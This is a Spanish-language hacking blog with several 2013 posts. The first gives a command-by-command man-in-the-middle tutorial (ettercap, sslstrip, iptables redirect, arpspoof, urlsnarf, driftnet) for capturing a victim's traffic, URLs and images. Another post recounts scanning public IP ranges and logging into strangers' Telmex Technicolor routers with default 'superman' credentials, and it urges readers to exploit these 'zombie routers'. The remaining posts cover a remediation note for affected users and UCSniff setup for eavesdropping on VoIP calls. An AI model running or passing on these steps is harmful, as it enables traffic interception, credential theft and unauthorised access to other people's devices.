viernes, 22 de agosto de 2014

lunes, 11 de marzo de 2013

Man in the Middle con Ett3rcap+Sslstrip+Driftnet









En esta ocasión voy a mostrarles como hacer un ataque MITM con las herrmanientas automatizadas incluidas en BackTrack 5. Lo primero que vamos a hacer es  abrir una consola e iniciar nmap, zenmap o angry ip scanner ya depende el gusto de cada quien para localizar nuestros potenciales targets, luego  configurar nuestro Ettercap sino lo tienes ya para que los paquetes de la victima lleguen al destino correcto...XD XD

Abrimos una consola y pegamos el siguiente destino nano /etc/etter.conf , luego localizamos las lineas 


#---------------
#     Linux 
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Así luce cuando esta en su configuración original.... debe de quedar así:


#---------------
#     Linux 
#---------------

# if you use ipchains:
   #redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
   #redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"



Lo que hicimos fue des-comentar las lineas:


redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


mediante la eliminación de los hashes (#) , ahora guardas y cierras.



Ahora llego el turno de iniciar Sslstrip


Abrimos una terminal y 
escribimos lo siguiente


cd /pentest/web/sslstrip

Luego para iniciarlo python sslstrip.py -a -k -f

Por lo que:

-a Registra todo el tráfico SSL y HTTP desde el server.
-k Mata sesiones en curso.
-f Sustituye el favicon en conecciones seguras.




Continuamos redirigiendo el trafico con este comando:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 



Luego iniciamos el plugin arpspoof que esta incluido en Dsniff con el siguiente comando:

arpspoof -i wlan0 -t (ip victima) (ip del router)


Y ya estamos cerca del objetivo....

Ahora iniciamos el Sniffeo en modo consola con Ettercap con el siguiente comando:

ettercap -Tq -L etterlogs -i wlan0 

Por lo que 
-Tq es para que se muestre en solo texto u no se muestre el contenido de los paquetes.
-L es para que escriba todos los logs en el archivo etterlogs .
-i es la interface de red.

Ahora usaremos UrlSnarf que como su nombre nos lo indica solo se dedicara a olfatear todos las URL solicitadas Sniffeadas del trafico Http en CLF (Common Log Format) utilizada en casi todos los servidores web. 

Bueno lo iniciamos con el siguiente comando:

urlsnarf -vvv -i wlan0

Donde :
-v es modo versus invierte el sentido de la concordancia para seleccionar las URL no coorrespondientes.
-i es la interface de red.


Y por ultimo mi buen amigo Driftnet que sirve para capturar imágenes del trafico de red...ya imaginaran lo que se puede hacer  XD XD.

Se inicia con el siguiente comando:  

driftnet -v -i wlan0

Cabe mencionar que todas estas pruebas se estan haciendo con la interfaz Wlan0 si no es tu caso el de estar conectado por red inalambrica hay que cambiar  por eth0 o cualquiera que sea, puedes saber que interfaz estas utilizando mediante el siguiente comando ya conocido por la mayoria de nosotros:

ifconfig


Gracias por leer y Enjoy the tool!!!!






domingo, 24 de febrero de 2013

Para los que resultaron Pwn34-2 la solucion!!!

Estimado usuario de TELMEX:

      Hola tal vez si estas aquí es por que tu módem a sido modificado  ya sea la encriptacion o el nombre de SSID o ambos, bueno si este es tu caso pensaras que lo que te ha pasado es un acto de lammerismo pero el hecho es que fuiste seleccionado para ser portavoz con tus familiares y amigos de la solución a un problema que lo llamamos en el mundo de la informática ´´Puerta Trasera´´ que forma parte de la estructura del firmware de tu Modem y que puede ocacionar perdida de datos en tu entorno. Bueno sin mas aqui la solución:

usuario: superman
password: superman

para empezar cambia la contraseña por defecto desde esta URL:

http://192.168.1.254/cgi/b/users/cfg/changepsswdpopup/

Despues para eliminar el acceso remoto al router descarga el archivo de configuración desde aqui_

http://192.168.1.254/backup.lp?be=0&l0=1&l1=1&tid=BACKUP_RESTORE



editar el archivo eliminando la linea ifadd name=HTTP group=wan



Despues de esto hay que volver nuevamente a la url
 http://192.168.1.254/backup.lp?be=0&l0=1&l1=1&tid=BACKUP_RESTORE   y volverlo a subir modificado


Si necesitas ayuda solo deja un comment,,,,

fuente www.hakim.ws

viernes, 22 de febrero de 2013

Technicolor TG582n y su puerta ancha trasera!!!








Hola el día de hoy voy a contarles mi experiencia con los modems technicolor de TELMEX...
Se me ocurrió la loca idea de checar mi ip publica fue ahi donde mi retorcida imaginacion empézo a formularse la idea de ¿Que pasaría si uso ipscanner y le asigno el rango de ip de la 1-255? 


Y bien que piensas cuando vez esta imagen? Pues todas las cosas que pasan por tu mente en este instante fue lo mismo que me paso, como sabemos Telmex usa varios modelos de routers en los que se incluye thompson, 2wire, huawei, motorola y el de la gloria el TECHNICOLOR que como ya sabemos si han seguido alguna de mis humildes ´´googleos´´ en la comunidad de México Seguridad Informática para usar el login de superusuario se usa:

Usuario: superman 
Password: superman

Ahora la tarea mas tediosa que seria ir de una por una IP en busca de una dirección que tenga Modem TECNICOLOR. Bueno volviendo poco tiempo atrás antes googlee vulnerabilidades en los demás routers, también intente ataques de diccionario con hydra-gtk pera el problema fue que por la red no encontré ningún diccionario con contraseñas por defecto en los módem Telmex y termine usando el diccionario que se utiliza en Router Keygen, oh problemaa ya que viene dividido en mas o menos 4500 fracciones de archivos .dat


Total para no hacerla tan larga me fui probando las ip y empezaron a saltar los technicolor. Ahora le quite el polvo a mi vieja cuenta de no-ip y estoy configurando de uno a uno para ver que mas locadas se me ocurre hacer.....

Si tienes alguna idea de que hacer con estos routers zombie inténtalo


Solo como recomendación cada router que configuren remotamente cámbienle el password de la cuenta de superusuario para que no sea tan facil que otro remoteadmin le cambie el jueguito.......
sin mas me despido y comenten que les parece...... Gracias

martes, 22 de enero de 2013

UCSniff


El día de hoy vamos a hablar de una si no la única herramienta de Pentest para sniffeo de VoIp con GUI que también soporta audio en tiempo real y monitorización de vídeo, con un reproductor multimedia integrado, para espiar en tiempo real en una empresa privada VoIP / video llamada.

Aquí el enlace de descarga UCSniff 

Para empezar instalar Dependencias Básicas
  • apt-get update
  • apt-get install build-essential
  • apt-get install zlib1g-dev liblzo2-dev
  • apt-get install libpcap0.8-dev libnet1-dev
  • apt-get install libasound2-dev
  • apt-get install libbz2-dev
Dependencias de GUI
  • apt-get install libx11-dev
  • apt-get install libxext-dev
  • apt-get install libfreetype6-dev
Dependencias de Monitoreo  de video en tiempo real
  • apt-get install vlc
  • apt-get install libvlc-dev
Dependencias de A/V Muxim
  • apt-get install libavformat-dev (this should also install libavutil-dev and libavcodec-dev)
  • apt-get install libavdevice-dev
  • apt-get install libswscale-dev
  • apt-get install libavfilter-dev
  • apt-get install libx264-dev
  • apt-get install libav-tools
Instalación opcional de  A/V Player/ Herramientas Muxim 
  • apt-get install mplayer
  • apt-get instll mencoder
Para remover Pulse Audio
apt-get remove pulseaudio


Ahora si lo más esperado la instalación de UCSniff.....
  1. tar -zxvf ucsniff-3.20.tar.gz
  2. cd ucsniff-3.20
  3. ./configure
  4. make
  5. make install

UCSniff con GUI y "Monitor en tiempo real de vídeo" hay que instalar los paquetes de dependencias:
  • apt-get install vlc
  • apt-get install libvlc-dev
  1. ./configure --enable-libvlc --enable-gui
  2. make
  3. make installI
Instalacion con GUI
  1. ./configure --enable-gui
  2. make
  3. make install
Si se enfrentan a errores de compilación que dicen "undeSi se enfrentan a errores de compilación que dicen "undefined reference" a ncurses.h, desinstalar libncurses5-dev paquete debian seguido de recompilar UCSniff debe resolver el problema:
  1. apt-get remove libncurses5-dev
  2. ./configure
  3. make
  4. make install
Gracias por  leer ... y ENJOY THE TOOL.